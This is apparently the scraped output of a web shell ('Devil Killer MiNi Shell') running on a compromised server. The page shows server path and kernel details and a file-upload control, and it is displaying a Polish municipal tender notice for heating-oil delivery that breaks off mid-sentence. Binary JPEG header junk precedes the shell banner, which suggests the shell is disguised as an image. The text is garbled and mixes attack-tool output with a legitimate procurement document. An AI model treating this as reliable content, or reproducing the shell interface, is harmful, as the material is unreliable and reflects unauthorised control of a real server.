JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231129/0052211901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP I DOSTAWA OLEJU OPAŁOWEGO DLA GMINY CIEPŁOWODY ORAZ JEDNOSTEK PODLEGŁYCH </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CIEPŁOWODY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890718432</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kolejowa 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ciepłowody</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">57-211</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@cieplowody.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.cieplowody.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP I DOSTAWA OLEJU OPAŁOWEGO DLA GMINY CIEPŁOWODY ORAZ JEDNOSTEK PODLEGŁYCH </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b007eae8-8ea9-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00522119</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00021532/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup i dostawa oleju opałowego dla Gminy Ciepłowody oraz jednostek podległych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b007eae8-8ea9-11ee-b55a-a22b2d7f700e <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2. Komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu Platformy e Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>3. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Sposób komunikowania się<br/>zamawiającego z wykonawcami (nie dotyczy składania ofert)<br/>1) Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do<br/>komunikacji umożliwiają<br/>również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj<br/>załącznik”). W przypadku załączników, które są zgodnie:<br/>a) z ustawą Pzp. lub<br/>b) rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 roku w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. z 2020 r., poz. 2452),<br/>- opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie<br/>z wyborem<br/>wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie<br/>zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub<br/>wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny,<br/>wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym<br/>plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ<br/>wewnętrzny).<br/>2) Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w<br/>pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia<br/>oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z<br/>„Formularzy do komunikacji” służących do zadawania pytań dotyczących treści<br/>dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na<br/>Platformie e-Zamówienia.<br/>3) Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne<br/>są po zalogowaniu w podglądzie postępowania w zakładce<br/>„Komunikacja”.<br/>4) Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>5) Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia link<br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu<br/>6) W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu 22 458 77 99 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>7) W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>sekretariat@cieplowod.pl (nie dotyczy składania ofert).<br/>8) Sposób sporządzenia dokumentów elektronicznych musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia<br/>30 grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452)<br/>2. Wykonawca ofertę składa za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania. Sposób złożenia<br/>oferty określono w dziale XII SWZ.<br/>3. Wykonawca składa ofertę, pod rygorem nieważności, w formie elektronicznej (postać elektroniczna opatrzona kwalifikowanym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym3 lub podpisem osobistym.<br/>4. Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250MB.<br/>5. Szczegółowe informacje w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016 r., str. 1), dalej „RODO”, zamawiający informuje,że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina<br/>Ciepłowody z siedzibą Urząd Gminy Ciepłowody, ul. Kolejowa 3, 57-211 Ciepłowody.<br/>2) inspektorem ochrony danych osobowych w Gminie Ciepłowody jest Pani/Pan Mariusz Kwaśnik e - mail: iod@valven.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b) i c) RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy Pzp.;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy a także o okres roszczeń wynikających z umowy (np. okres gwarancji, rękojmi za wady) a także okres archiwizacji<br/>dokumentacji o udzielenie zamówienia<br/>publicznego na podstawie rozporządzenia Prezesa Rady Ministrów z dnia 18 stycznia 2011 roku w sprawie instrukcji kancelaryjnej,<br/>jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (Dz. U. z<br/>2011 r., Nr 14, poz. 67 z późn. zm.) 5 lat postępowanie o udzielenie zamówienia i 10 lat umowa o udzielenie zamówienia okres<br/>podlega wydłużeniu jeśli umowa o dofinansowanie przewiduje termin<br/>dłuższy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>2. Jeżeli administrator planuje dalej przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane, przed<br/>takim dalszym przetwarzaniem informuje on osobę, której dane dotyczą, o tym innym celu oraz udziela jej wszelkich innych<br/>stosownych informacji, o których mowa w art. 13 ust. 2 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. posiada Pani/Pan: − na podstawie art. 15 RODO prawo dostępu do danych<br/>osobowych Pani/Pana<br/>dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 ust. 1 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem art. 19 ust. 3 ustawy Pzp oraz przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych z siedzibą przy ul. Stawki 2, 00-193 Warszawa<br/>(www.uodo.gov.pl.), gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>2. nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.”</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BGP.271.17.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa oleju opałowego lekkiego w <br/>okresie 12 miesięcy z przeznaczeniem na potrzeby Gminy Ciepłowody i podległych jej<br/>4<br/>jednostek organizacyjnych. Wszystkie obiekty do których będzie dostarczany opał, <br/>znajdują się na terenie Gminy Ciepłowody. Olej opałowy powinien spełniać wymagania <br/>obowiązującej w Polsce normy jakościowej PN-C-96024:2011 dla gatunku L1 .<br/>Opis wymogów Zamawiającego dotyczących przedmiotu zamówienia:<br/>• Olej opałowy lekki o wartości opałowej min 42,6 MJ/kg.<br/>• Gęstość w temp. 15ºC max 860 kg/m3<br/>.<br/>• Lepkość kinetyczna w temperaturze 20ºC max 6,00 mm2<br/>/s.<br/>• Zawartość siarki max 0,10 % (m/m).<br/>• Pozostałość po spopieleniu max 0,01 %(m/m).<br/>• Zawartość wody max 200 mg/kg.<br/>• Całkowita zawartość zanieczyszczeń nie większa niż 24 mg/kg.<br/>• Temperatura płynięcia max -20ºC<br/>• Temperatura zapłonu min 56ºC<br/>• Barwa (wizualna) czerwona </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09135100-5 - Olej opałowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu;<br/>a) w postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunek dotyczący:<br/>− braku podstaw do wykluczenia z postępowania o udzielenie zamówienia <br/>publicznego w okolicznościach, o których mowa w art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp.;<br/>− braku podstaw do wykluczenia w okolicznościach, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2023 r., poz. 129 z późn. zm.).<br/>2) spełniają warunki udziału w postępowaniu określone w art. 112 ust. 2 pkt 1 - 4 ustawy Pzp.;<br/>a) Zdolności do występowania w obrocie gospodarczym.<br/>Opis sposobu dokonywania oceny spełniania tego warunku.<br/>Zamawiający nie precyzuje warunku.<br/>b) W zakresie uprawnień do prowadzenia określonej działalności gospodarczej <br/>lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Opis sposobu dokonywania oceny spełniania tego warunku.<br/>Warunek ten zostanie spełniony, jeżeli wykonawca posiada:<br/>- aktualną koncesją na prowadzenie działalności w zakresie objętym zamówieniem, czyli obrotem <br/>paliwami ciekłymi udzieloną na podstawie ustawy z dnia 10.04.1997 r. - Prawo energetyczne (Dz. U. <br/>z 2019 r., poz. 755 ze zm.);<br/>Informacje dodatkowe:<br/>• Wykonawca ma obowiązek posiadania stosownych zezwoleń, pozwoleń, zgód, zgłoszeń, <br/>koncesji, licencji itp. zwanych dalej „zezwoleniami” przez cały okres trwania umowy oraz ich <br/>okazywania Zamawiającemu na każde jego wezwanie. W przypadku, gdy którekolwiek z <br/>dotychczasowych zezwoleń wygasło lub zostało cofnięte w okresie obowiązywania niniejszej <br/>umowy, Wykonawca zobowiązany jest przedstawić nowe zezwolenie w tym zakresie, nie <br/>później niż w ostatnim dniu obowiązywania dotychczasowego.<br/>• Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, jest spełniony, jeżeli co <br/>najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada <br/>uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i realizuje <br/>usługi, do których realizacji te uprawnienia są wymagane.<br/>• W przypadku gdy, Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, Zamawiający może żądać odpowiedniego zezwolenia, licencji, koncesji lub wpisu do rejestru działalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia określonych usług w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.<br/>c) W zakresie sytuacji ekonomicznej lub finansowej<br/>Opis sposobu dokonywania oceny spełniania tego warunku.<br/>Zamawiający nie precyzuje warunku. <br/>d) W zakresie zdolności technicznej lub zawodowej<br/>Opis sposobu dokonywania oceny spełniania tego warunku.<br/>Wykonawca winien dysponować autocysterną z pompą umożliwiającą napełnienie zbiorników w obiektach wymienionych w załączniku nr 8 do SWZ. <br/>Autocysterna dostarczająca olej opałowy ma być wyposażona w atestowany, zalegalizowany licznik prawidłowo wskazujący dostarczoną/zatankowaną ilość opału.<br/>Ocena spełnienia ww. warunków udziału w postępowaniu zostanie dokonana na podstawie przedłożonych przez wykonawcę oświadczeń wg zasady spełnia/ nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2. Podmiotowe środki dowodowe składane na wezwanie zamawiającego.<br/>1) Zamawiający żąda od wykonawcy, którego oferta została najwyżej oceniona następujące podmiotowe środki dowodowe w celu potwierdzenia brak podstaw do wykluczenia.<br/>a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp., - wg wzoru załącznika nr 7 do SWZ o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i <br/>Informacji o Działalności Gospodarczej, w zakresie art. 